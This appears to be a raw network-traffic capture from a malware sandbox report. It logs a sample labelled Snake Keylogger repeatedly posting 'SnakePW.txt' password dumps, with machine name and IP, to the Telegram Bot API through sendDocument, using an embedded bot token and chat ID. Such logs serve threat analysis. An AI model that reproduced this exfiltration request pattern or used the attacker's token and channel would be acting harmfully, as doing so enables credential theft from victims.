                                                                    2022-06-26 07:33:51 UTC284OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 62 35 33 63 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ffb53c00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:51 UTC284INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:51 UTC284INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66936,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    169192.168.2.550025149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:51 UTC285OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757000186aa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:51 UTC285OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 30 31 38 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757000186aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:52 UTC286INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:52 UTC286INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66937,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    17192.168.2.549785149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:45 UTC28OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d875d3f9
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:45 UTC29OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 37 35 64 33 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d875d3f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:45 UTC29INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:45 UTC29INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66764,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228765,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    170192.168.2.550026149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:52 UTC287OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575700385bfd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:52 UTC287OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 33 38 35 62 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575700385bfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:52 UTC287INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:52 UTC288INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66938,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228832,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    171192.168.2.550028149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:52 UTC288OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570073f6e2
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:52 UTC289OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 37 33 66 36 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570073f6e2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:52 UTC289INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:52 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:52 UTC289INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66939,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228832,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    172192.168.2.550029149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:52 UTC290OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575700b1f3ff
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:52 UTC290OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 62 31 66 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575700b1f3ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:53 UTC291INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:53 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:53 UTC291INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66940,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228833,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    173192.168.2.550030149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:53 UTC292OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575700fe3f2e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:53 UTC292OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 66 65 33 66 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575700fe3f2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:53 UTC292INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:53 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:53 UTC293INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66942,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228833,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    174192.168.2.550031149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:53 UTC293OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757013c3be7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
